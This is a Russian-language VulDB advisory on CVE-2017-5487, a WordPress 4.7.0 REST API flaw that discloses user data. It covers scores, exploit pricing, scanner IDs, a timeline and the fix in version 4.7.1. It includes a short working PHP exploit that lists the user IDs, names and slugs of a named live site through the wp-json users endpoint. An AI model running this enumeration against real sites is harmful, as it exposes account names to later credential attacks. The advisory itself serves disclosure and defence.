WordPress 4.7.0 REST API class-wp-rest-users-controller.php раскрытие информации

CVSS Meta Temp ScoreТекущая цена эксплойта (≈)Балл интереса CTI
5.1$0-$5k0.00

СводкаИнформация

Была найдена уязвимость, отнесённая к категории проблематичный, в WordPress 4.7.0. Поражена неизвестная функция файла wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php компонента REST API. Осуществление манипуляции приводит к раскрытие информации. Уязвимость зарегистрирована как CVE-2017-5487. Атака может быть осуществлена удаленно. Более того, существует эксплойт. Рекомендуется обновить затронутый компонент.

ПодробностиИнформация

Была найдена уязвимость, отнесённая к категории проблематичный, в WordPress 4.7.0. Поражена неизвестная функция файла wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php компонента REST API. Осуществление манипуляции приводит к раскрытие информации. Декларирование проблемы с помощью CWE приводит к CWE-200. Ошибка была обнаружена 11.01.2017. Информация о слабости была опубликована 15.01.2017 автором Dctor (oss-sec). Консультация доступна для загрузки на openwall.com.

Уязвимость зарегистрирована как CVE-2017-5487. Назначение CVE произошло 14.01.2017. Атака может быть осуществлена удаленно. Имеются технические подробности. Уровень популярности этой уязвимости ниже среднего значения. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Сейчас цена на эксплойт приблизительно равна USD $0-$5k. Согласно MITRE ATT&CK, техника атаки, используемая в данной проблеме, имеет значение T1592.

Указано значение функциональный. Эксплойт доступен по адресу exploit-db.com. В случае 0-day эксплойта, предполагаемая цена на подпольном рынке была около $5k-$25k. Код, используемый эксплойтом, следующий:

header ('Content-type: text/html; charset=UTF-8');
 
 
$url= "https://bucaneiras.org/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
    echo "-----------------------------\n";
foreach($json as $users){
    echo "[*] ID :  |" .$users['id']     ."|\n";
    echo "[*] Name: |" .$users['name']   ."|\n";
    echo "[*] User :|" .$users['slug']   ."|\n";
    echo "\n";
}echo "-----------------------------";} 
else{echo "[*] No user";}
Сканер уязвимостей Nessus предоставляет плагин с идентификатором 96606. Он принадлежит семейству CGI abuses. Плагин работает в контексте типа r. Коммерческий сканер уязвимостей Qualys способен проверить эту проблему с помощью плагина 11772 (WordPress REST API User Enumeration Vulnerability).

Переход на версию 4.7.1 способен решить эту проблему. Обновлённая версия доступна для загрузки по адресу github.com. Рекомендуется обновить затронутый компонент.

Данная уязвимость также присутствует в других базах данных уязвимостей: SecurityFocus (BID 95391) и Tenable (96606).

ПродуктИнформация

Тип

Имя

Версия

Лицензия

Веб-сайт

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 5.1

VulDB Базовый балл: 5.3
VulDB Временная оценка: 4.9
VulDB Вектор: 🔍
VulDB Надёжность: 🔍

NVD Базовый балл: 5.3
NVD Вектор: 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍

NVD Базовый балл: 🔍

ЭксплуатацияИнформация

Класс: раскрытие информации
CWE: CWE-200 / CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍

Физический: Нет
Локальный: Нет
Удалённый: Да

Доступность: 🔍
Доступ: публичный
Статус: функциональный
Автор: Dctor
Язык программирования: 🔍
Скачать: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Прогноз цен: 🔍
Оценка текущей цены: 🔍

0-DayРазблокироватьРазблокироватьРазблокироватьРазблокировать
СегодняРазблокироватьРазблокироватьРазблокироватьРазблокировать

Nessus ID: 96606
Nessus Имя: WordPress < 4.7.1 Multiple Vulnerabilities
Nessus Файл: 🔍
Nessus Риск: 🔍
Nessus Семейство: 🔍
Nessus Context: 🔍

OpenVAS ID: 100908
OpenVAS Имя: WordPress json User Enumeration Vulnerability
OpenVAS Файл: 🔍
OpenVAS Семейство: 🔍

Qualys ID: 🔍
Qualys Имя: 🔍

Exploit-DB: 🔍

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендация: Обновление
Статус: 🔍

0-дневное время: 🔍
Задержка эксплуатации: 🔍

Обновление: WordPress 4.7.1
Патч: github.com

ХронологияИнформация

11.01.2017 🔍
11.01.2017 +0 дни 🔍
11.01.2017 +0 дни 🔍
14.01.2017 +3 дни 🔍
14.01.2017 +0 дни 🔍
15.01.2017 +1 дни 🔍
15.01.2017 +0 дни 🔍
18.01.2017 +3 дни 🔍
03.03.2017 +44 дни 🔍
03.03.2017 +0 дни 🔍
17.11.2025 +3181 дни 🔍

ИсточникиИнформация

Продукт: wordpress.com

Консультация: daf358983cc1ce0c77bf6d2de2ebbb43df2add60
Исследователь: Dctor
Статус: Подтверждённый
Подтверждение: 🔍

CVE: CVE-2017-5487 (🔍)
GCVE (CVE): GCVE-0-2017-5487
GCVE (VulDB): GCVE-100-95347
SecurityFocus: 95391 - WordPress Prior to 4.7.1 Information Disclosure Vulnerability
SecurityTracker: 1037591

scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍

ВходИнформация

Создано: 15.01.2017 10:40
Обновлено: 17.11.2025 05:06
Изменения: 15.01.2017 10:40 (88), 08.06.2020 09:18 (3), 28.10.2022 20:06 (5), 17.11.2025 05:06 (14)
Завершенный: 🔍
Cache ID: 216:FEE:103

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Обсуждение

Want to stay up to date on a daily basis?

Enable the mail alert feature now!